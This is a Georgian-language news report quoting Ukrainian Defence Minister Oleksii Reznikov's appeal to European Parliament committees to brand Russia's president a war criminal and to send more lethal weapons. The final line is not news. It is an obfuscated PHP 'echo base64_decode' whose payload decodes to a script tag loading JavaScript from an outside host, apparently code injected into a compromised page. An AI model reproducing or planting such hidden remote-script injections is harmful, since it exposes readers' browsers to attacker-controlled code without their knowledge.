celsiusi
ავერსი საქკაბელი
უკრაინის თავდაცვის მინისტრმა, ოლექსეი რეზნიკოვმა საგარეო და თავდაცვის კომიტეტებებზე ონლაინ ჩართვისას ევროპარლამენტარებს მოუწოდა, აღიარონ რუსეთის პრეზიდენტი ომის დამნაშავედ! 
 
მისივე თქმით, ამას ბევრი მაგალითი მოწმობს, მათ შორის მარიუპოლის თეატრზე თავდასხმა.
 
"უკრაინელმა ხალხმა რვა წლის წინ გააკეთა თავისი ცივილიზებული არჩევანი და ეს არის ევროპული ინტეგრაცია. დღეს ჩვენ იარაღით ხელში ვიცავთ ამ არჩევანს და მისი ფასი არის ძალიან მაღალი, ამას კი ყველა ხედავს, ჩვენ ამ ფასს ვიხდით ყოველ დღე. ევროპული ინტეგრაციის გარდა, სხვა ალტერნატივას, სხვა არჩევანს არც განვიხილავთ.
 
დემოკრატია, ადამიანის უფლებების დაცვა არის ჩვენი არჩევანი, ტირანია კი მიუღებელია. სულ რაღაც რამდენიმე კვირის წინ, თქვენც გააკეთეთ არჩევანი ევროკავშირში უკრაინის გაწევრიანების სურვილის მხარდაჭერით და ამისთვის მადლობას გიხდით.
 
რასაც დღეს კრემლი აკეთებს ეს ნამდვილი ბარბაროსობაა, მე გეუბნებით, რომ კრემლი დღეს წარმოადგენს დღევანდელობის ჰიტლერს. ემოციის გარეშე არც შემიძლია საუბარი იმაზე, თუ რას ჩადის დღეს რუსეთი, ეს არ არის უბრალოდ ომი, აგრესორის არმია გამიზნულად კლავს მშვიდობიან მოსახლეობას, ბომბავს საცხოვრებელ უბნებს, ანგრევს ქალაქებს და სოფლებს. მადლობა, რომ ოპერატიულად მიიღეთ გადაწვეტილება სამხედრო დახმარებაზე, მაგრამ ჩვენ მეტი ლეტალური შეიარაღება გვესაჭიროება, რათა აგრესორს ვებრძოლოთ," - განაცხადა უკრაინის თავდაცვის უწყების პირველმა პირმა ოლექსი რეზნიკოვმა.
 
820
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");